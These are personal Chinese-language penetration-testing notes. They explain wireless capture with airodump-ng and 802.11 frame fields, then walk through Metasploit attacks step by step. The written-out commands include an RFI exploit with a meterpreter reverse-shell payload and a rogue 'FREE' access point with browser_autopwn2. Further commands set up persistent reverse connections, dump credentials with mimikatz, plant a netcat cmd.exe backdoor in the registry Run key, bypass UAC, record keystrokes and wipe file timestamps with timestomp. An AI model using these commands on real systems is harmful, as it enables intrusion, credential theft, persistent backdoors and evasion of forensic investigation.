airmon-ng 检测网卡驱动

airmon-ng check 检测是否会与套件有冲突

airmon-ng check kill 直接杀掉冲突的

airmon-ng start wlan2 启动侦听，把网卡置入混杂模式,可以在后面跟信道

airmon-ng stop wlan2 停止抓包，恢复原状

airodump-ng wlan2mon 置入hooping模式，在各个信道轮询么，发现每个信道的AP

airodump-ng wlan2mon -c 1 抓指定信道，多一列rxq，由于信道有重叠，可能抓到别的信道

--bssid 跟bssid，指定只抓跟某个AP的有关

-w 保存抓到的信息

--ivs 只抓wep中有ivs信息的包

BSSID AP的MAC地址

PWR 信号强度 -1的时候表示接受不了

RXQ 最近十秒成功接收的数据帧的百分比，有date内容的

beacons 接收到的此AP的beacons数量

#Data 抓到的数据帧数量。WEP表示IV数量，包括广播

#/s 最近十秒平均每秒抓到的帧的数量

CH 信道

MB AP支持的最大速率

ENC 采用的无线安全技术 WEP WPA WPA2 OPEN

CIPHER 采用的加密套件 CCMP TKIP WEP40 WEP104

AUTH 身份认证方法 MGT企业 PSK个人 SKA WEP共享密钥

ESSID 无线AP名称 隐藏的为空 显示长度

airodump 从 probe和 association request 来发现隐藏AP

STATION STA的MAC地址

LOST STA的丢包数量

Frame/Packets STA发送的数据包数量

Probes STA发送的 探测帧

beacon frames

发包频率 1024ms 可变

时间单位 1024ms（毫秒）

SSID网络名

隐藏AP不发SSID广播

00:20:00

More frag 1bit 表示是否还有后续帧

值为1时表示有后续，可能是Data或者Management帧类型。只有单播接受地址会被分段，广播不会分

Retry 1bit 重传

可能是Data或者Management帧

接受进程使用此值防止帧重复

Power Mgmt 1bit 控制供电模式

活动模式0 省电模式1

无线网卡放大器组件耗电大，

STA处于省电模式，向管联的AP发送该值为1的帧，AP不使用此字段，省电模式喜爱STA几乎不接受数据，发送给他的Data帧由AP暂时缓存

More Data 1bit

但AP缓存至少一个MSDU，会向省电模式的STA发送该值为1的帧，表示有数据要传给STA，接受此帧的STA唤醒自己并向AP发送PS-Poll帧，取回AP为其缓存的数据，也被用于AP有更多的广播/多播帧需要发送

Protected Frame 1bit

可能是Data或Management帧类型，表示MSDU是否被加密。也可能被用于表示PSK身份验证Frame#3帧，数据载荷为空，该位为0

Order 1bit

在非QoS帧的情况下，值为1表示数据必须严格顺序处理，通常为0

Duration / ID 16bit

所有Control帧都使用该字段，其作用随Type/SubType变化

帧类型为PS Poll（type：1，subtype：10）时，表示STA关联额AID

其他情况下该字段作为一种载波侦听机制，表示接受下一帧之前需要保持的时间间隔 NAV 单位是微秒

MAC Layer Address

BSSID是BSS的2层标志

Sequence Control 16bit 控制数据分段

这个字段包含两个子字段 Sequence Number 和 Fragment Numeber

Sequence Number是每个帧的编号，数值范围是0-4095，以1为步长递增，当帧被分段的时候，同一帧不同分段的该值相同

Fragment Number 是被分段的帧用于表示分段位置顺序的编号，数值范围是0-15，以1为步长递增

数据字段未加密的最大MSDU长度为2304字节（其中包含156字节上层头i信息，和可被传递的数据2048字节）

不同加密会增加的内容长度

WEP 8 bytes

TKIP（WPA1） 20 bytes

CCMP （WPA2） 16 bytes

FCS（Frame） 32bit 帧校验

发送端对MAC头和Frame Body内容进行CRC计算，计算结果即为FCS，接受端进行同样计算，结果不同就丢弃，广播和多播不会校验FCS

wireshark抓包已经删除了

子类型 0-6没有使用

Control Frame

type 为 1 没有数据段data

一些通知设备开始、停止传输或连接失败等情况的短消息

ACK

接收端接受数据后向发送端返回的确认

每个单播帧需要ACK立即确认，广播和组播不用确认

尽快响应，由硬件完成，而非驱动层

PS-POLL

RF系统的放大器

主要耗电的组件 发射前加大信号 几乎完全关闭，不是完全关闭

AID 关联ID

唤醒省电模式

首先要增加一个monitor网卡

iw dev wlan2 interface add wlan0mon type monitor

无线基于广播，不安全，monitor都能抓到

Radiotap头

一种事实标准，linux在驱动和内建api中都支持

传递额外信息，不同厂家的信息不一样，但是有一个基本的包头机构，长度不固定，不破坏802.11原始头结构，传递额外信息

分为Header和Data两部分

Header部分

revision（8bit）一直为0，pad（8bit）也是0 ，length（16bit）Radiotap头的长度，标记802.11包的开始，present （32bit）掩码，来表示接下来的数据位的掩码，最后一个位 ext，如果为1，则下面还有掩码（一般是厂家自定义的）MAC ： timetamp datarate

DU（Data Unit）即数据单元，即信息传输的最小数据集合。

Encapsulation 传递过程逐层封装

SDU（service Data Unit）/PDC（Protocol Data Unit）

MSDU > MIC 分帧 添加IV（添加起始向量） 添加MAC头部 MPDU

MPDU/PSDU+物理头=PPDU > RF发射

802.11头部

MAC头部 30bytes 分为7段内容

Sequence Control 序号

Frame control 帧控

 protocol version 协议版本 2bit 可能为 0 1 2 3 不永远为0

type 帧类型 2bit 控制帧 1 数据帧 2 管理帧 0
 子类型还有很多

To DS/From DS 各1bit

不同组合，影响后边的四个地址的含义

qrcode 二维码

及时清理临时文件

发现主机

扫描结果从别的工具导入

 使用bind_hidden的payload

设置允许链接的主机，平时侦听不打开，一旦有来自允许连接的主机的连接访问，则打开侦听

find attack 按照信息自动匹配exp

hail mary 尝试所有匹配的exp

socks代理

可以把自己变成代理服务器

让其他的主机来通过kali来攻击目标

script

扩展功能

catana脚本引擎

kali默认有一个

Veil-Evasion：/use/share/veil-evasion/tools/cortana/veil_evasion.cna

下载别的cortana脚本

https://github.com/rsmudge/cortana-scripts

Armitage只是一个前端工具，调用msf的漏洞利用能力

据说模拟对抗比较适用

团队合作

客户端 Armitage

服务器 msfrpcd

团队成员资源共享

可脚本

单机启动方式

service postgresql start

团队方式

 /usr/share/armitage/

Teamserver得启动,直接用就行

teamserver IP地址 登录密码

发现目标

各种扫描

开启远程包含

vi /etc/php5/cgi/php.ini  #php info
allow_url_fopen = On
allow_url_include = On

RFI 远程文件包含利用

use exploit/unix/webapp/php_include

set RHOST 1.1.1.2
set PATH /dvwa/vulnerabilities/fi/  存在文件包含的路径

set PHPURI /?page=XXpathXX 存在文件包含的页面(XXpathXX自动替换)

指定头信息，带上cookie

set HEADERS "Cookie:security=low;
PHPSESSID=eefcf023ba61219d4745ad7487fe81d7"

设置payload

set payload php/meterpreter/reverse_tcp
set lhost 1.1.1.1

Karmetasploit 嗅探密码 截获数据 浏览器攻击

只是一个资源文件

先创造一个伪造AP

然后调用资源文件

基础架构配置 DHCP

 apt-get install isc-dhcp-server
 cat /etc/dhcp/dhcpd.conf
 option domain-name-servers 10.0.0.1;
 default-lease-time 60;
 max-lease-time 72;
 ddns-update-style none;
 authoritative;
 log-facility local7;
 subnet 10.0.0.0 netmask 255.255.255.0 {
 range 10.0.0.100 10.0.0.254;
 option routers 10.0.0.1;
 option domain-name-servers 10.0.0.1;
 }

伪造AP

airmon-ng start wlan0 #启动侦听模式
airbase-ng -P -C 30 -e "FREE" -v wlan0mon
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0

建立dhcp租约文件

touch /var/lib/dhcp/dhcpd.leases

启动dhcp服务

dhcpd -cf /etc/dhcp/dhcpd.conf at0

启动karmetasploit

msfconsole -q -r karma.rc_.txt                                                                   

修改配置让受害者可以上网

vi karma.rc_.txt

删掉setg有关的参数

添加使用browser_autopwn2模块

检查恶意流量的模块

auxiliary/vsploit/malware/dns* 好几个模块，以dns开头的

 Mariposa 僵尸程序，该模块来查看，流量的流向，是否有访问CC端

zeus 僵尸程序

启动路由，iptables转发规则

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

持久shell

run metsvc -A 再目标打开一个端口，创建一个服务，上传执行文件

不支持加密，不支持身份认证

连接目标

use exploit/multi/handler
set PAYLOAD windows/metsvc_bind_tcp
set LPORT 31337
set RHOST 1.1.1.1

另外一种，默认使用反向连接

run persistence -h

延迟10秒启动，重启时自动反向连接

run persistence -X -i 10 -p 4444 -r 1.1.1.1

run persistence -U -i 20 -p 4444 -r 1.1.1.1
run persistence -S -i 20 -p 4444 -r 1.1.1.1

Mimikatz

获取  msv ssp tspkg livessp 身份认证方式的凭据

wdigest 、kerbers查询内存中明文的密码

mimikatz_command -f a:: 通过犯错来获取有哪些模块

mimikatz_command -f samdump::hashes 查看bootkey lm/ntlm hash
mimikatz_command -f handle::list 查看当前系统进程，也可以停
mimikatz_command -f service::list 查看有哪些服务，可以停

mimikatz_command -f crypto::listProviders 查看支持的加密套件

mimikatz_command -f winmine::infos 查看雷的信息，这是一个关于扫雷的模块 

PHP shell

java的也行，asp的也行

msfvenom -p php/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=3333 -f
raw -o a.php

上传到服务器，用浏览器访问，msf侦听

Web Delivery

利用系统代码执行漏洞

use exploit/multi/script/web_delivery

post 模块 取得shell之后使用的模块

set exitonsession false

获得shell之后继续侦听

通过jobs查看后台的shell

run post/windows/gather/arp_scanner RHOSTS=2.1.1.0/24 扫描网段

run post/windows/gather/checkvm 检查是不是虚拟机

run post/windows/gather/credentials/credential_collector 收集Token

run post/windows/gather/enum_applications 枚举安装的软件

run post/windows/gather/enum_logged_on_users 查看当前登录的id

run post/windows/gather/enum_snmp 枚举snmp

run post/multi/recon/local_exploit_suggester 侦查有哪些本地提权漏洞

run post/windows/manage/delete_user USERNAME=yuanfh

删除用户，但用户不会被自动注销

run post/multi/gather/env

获取目标详细信息

run post/multi/gather/firefox_creds

把火狐浏览器里保存的用户和密码

run post/multi/gather/ssh_creds

提取保存的ssh的密码密文，登录的证书

run post/multi/gather/check_malware

REMOTEFILE=c:\\a.exe

检查指定文件是不是恶意软件

自动执行脚本参数

最优先的那个

set InitialAutoRunScript migrate -n explorer.exe

自动运行post模块

获取最近打开的文件，前提要先迁移到目标用户帐号的进程

set AutoRunScript post/windows/gather/dumplinks

两个可以指定的位置

编辑目标的hosts文件

set AutoRunScript hostsedit -e 1.1.1.1,www.baidu.com

Pivoting 跳板/枢纽/支点

meterpreter功能

利用路由功能

run autoroute -s 2.1.1.0/24

去往这个网段的，都通过跳板（已经或得的session）

对db_nmap不起作用,对msf里的模块有用

端口转发

   portfwd add -L LIP -l LPORT -r RIP -p RPORT
   portfwd add -L 1.1.1.10 -l 445 -r 2.1.1.11 -p 3389
   portfwd list / delete / flush

meterpreter在内存里运行

抓包

load sniffer

启动一个缓存区块来存储数据包（5000）

load sniffer
sniffer_interfaces
sniffer_start 2
sniffer_dump 2 1.cap
/ sniffer_dump 2 1.cap

自动过滤meterpreter流量，全程使用 SSL/TLS加密

用msf解数据包

use auxiliary/sniffer/psnuffle

set PCAPFILE 1.cap

搜索文件

search -f *.ini

空格需要加转义符
search -d c:\\documents\ and\settings\\administrator\\desktop\\ -f *.docx

密码破解

获取hash，得有system权限，结果在tmp下

use post/windows/gather/hashdump

破解 John the Ripper

use auxiliary/analyze/jtr_crack_fast

自动调用tmp里的hash

文件系统访问会留下痕迹，电子取证重点关注

访问文件系统就如在雪地上行走

避免被电子取证发现，不要碰文件系统，meterpreter先天优势，完全基于内存

 MAC时间（Modified 修改/Accessed 最后访问查看时间/Changed 属性修改记录）

MACE：MFT entry 微软下有，mft的项

MFT：主文件分配表，通常在最前的分区，通常1024字节或两个硬盘扇区，其中存放多项entry信息，包含大量信息（大小 名称 目录位置 磁盘位置 创建时间）

查看

ls -l --time=atime/mtime/ctime 1.txt

stat 1.txt

修改时间

touch -d "2 days ago" 1.txt
touch -t 1501010101 1.txt

msf的修改工具

Timestomp (meterpreter)

timestomp -v 1.txt 查看

timestomp -f c:\\autoexec.bat 1.txt 从模板提取时间出了修改到目标

timestomp -z "MM/DD/YYYY HH24:MI:SS" 2.txt 手动的修改某个时间 -m / -a / -c / -e / -z

-b 擦除MACE -r 递归一个目录，全部擦掉

注册表修改不当，可直接系统崩溃

修改前备份注册表

某些修改是不可逆的

正版序列号存在注册表里

保存的帐号密码也在注册表里

修改、增加启动项

窃取存储于注册表的机密信息

绕过文件型病毒查杀

meterpreter

用注册表添加NC]后门

添加一个自动启动项

上传文件

    upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

枚举某主键下的键值

    reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

增加一个键值

    reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc
-d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'

查询

    reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -
v nc

打开防火墙端口

execute -f cmd -i -H
netsh firewall show opmode
netsh firewall add portopening TCP 4444 "test" ENABLE ALL
shutdown -r -t 0
nc 1.1.1.1 4444

local 模块都是基于一个已有的权限不够大的session

load priv 插件

提权插件

UAC会影响提权等操作

绕过UAC提权，前提获得的session是administrator权限

use exploit/windows/local/ask

每次执行操作的时候，都会在目标那询问，是否可以执行，挂载payload上去，然后利用已经有的session来执行，若目标点击是，则再获得一个shell，成功绕过UAC

use exploit/windows/local/bypassuac

利用已有session，直接绕过UAC

use exploit/windows/local/bypassuac_injection

通过一个dll来注入，来绕过UAC

利用漏洞直接提权为system，直接获得system的shell，也是利用已有的session，不论权限

use exploit/windows/local/ms13_053_schlamperei

失败

use exploit/windows/local/ms13_097_ie_registry_symlink
use exploit/windows/local/ppr_flatten_rec

这个成了DoS了

use exploit/windows/local/ms13_081_track_popup_menu

图形化shell，但是无法操作

set payload windows/vncinject/reverse_tcp

改一个配置，生产可以操作的额shell

set viewonly no

viewonly 只看

nmap 192.168.1.1 1-254-PU53 -SN

发现一个ip地址段，SN不做端口扫描，只做四层发现

pu代表扫描的端口号

nmap 192.168.1.1 -254-PA80 -SN

提权

meterpreter

use priv
run post/windows/capture/keylog_recorder

tailf 跟踪查看文件

自动利用一些比较好的exploit，会根据来访问的客户端类型来自动选择payload

use auxiliary/server/browser_autopwn2

安卓后门

vba感染word、excel

更改中文输入法

apt-get install ibus-pinyin

新版本的openvas安装有问题，，

msf与漏洞扫描器的结合

本质是msf作为一个管理工具向openvas发送扫描参数

load插件或者导入openvas的nbe日志,nessus也是，nexpose是xml格式的

db_import

vulns 查看扫描到的弱点

直接调用nessus

nessus_connect 连接nessus

nessus_connect admin:password@127.0.0.1

nessus_policy_list 查看已经有的策略

nessus_scan_new

apt-get --download-only install  只下载

contrl

postinstall 安装完执行的脚本

编写脚本发送icmp报文，探测主机系统版本信息